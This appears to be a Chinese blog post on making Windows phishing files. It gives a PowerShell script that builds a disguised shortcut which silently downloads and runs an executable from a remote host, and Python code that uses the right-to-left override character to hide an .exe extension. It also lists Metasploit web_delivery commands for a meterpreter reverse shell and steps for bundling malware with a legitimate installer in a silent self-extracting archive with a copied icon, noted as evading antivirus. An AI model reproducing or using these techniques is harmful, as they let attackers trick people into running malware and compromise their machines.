常见windows钓鱼文件制作

快捷方式

1.ps1:

1
2
3
4
5
6
$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe"
$Shortcut.Save()

执行生成

1
powershell -ExecutionPolicy RemoteSigned -file 1.ps1

文件后缀RTLO

可生成视觉效果看起来后缀为正常的文件

原理是为了支持阿拉伯语,希伯来语等从右向左写的语言。

1
2
3
4
import os  
os.rename('test.txt', 'test-\u202egnp.txt')
import os
os.rename('cmd.exe', u'no\u202eFDP.exe')

CHM

cs

1
点击attacks——>web Drive by——>scripted web Delivery

msf

1
2
3
4
5
6
7
use exploit/multi/script/web_delivery 
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.10.128 #本机地址
set srvhost 0.0.0.0
set srvport 8080

自解压文件

准备两个文件,恶意文件和正规渠道下载的合法文件,同时添加到压缩文件,创建自解压格式压缩文件。

点击高级自解压选项

1
2
3
4
5
6
7
8
9
10
11
12
常规:
解压路径->绝对路径
C:\windows\temp
设置:
提取后运行
C:\windows\temp\恶意软件名.exe
C:\windows\temp\合法软件名.exe
模式:
安静模式->全部隐藏
更新:
更新方式->解压并更新文件
覆盖方式->覆盖所有文件

点击确定生成xxx.exe格式的自解压文件。

然后使用ResourceHacker工具,打开原本合法文件.exe,将Icon Group文件保存为.ico

然后使用ResourceHacker打开生成的自解压文件,将Icon Group文件替换为新的文件,保存后修改刷新下文件名图标就修改过来了。

打开执行生成的捆绑文件(前提是里面的恶意文件本身免杀)360不报毒,然后用户看到的是正常合法文件的安装程序。

office宏

http://next.uuzdaisuki.com/2020/08/20/office%E5%AE%8F%E6%94%BB%E5%87%BB/

参考

https://www.chabug.org/tools/2017.html


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!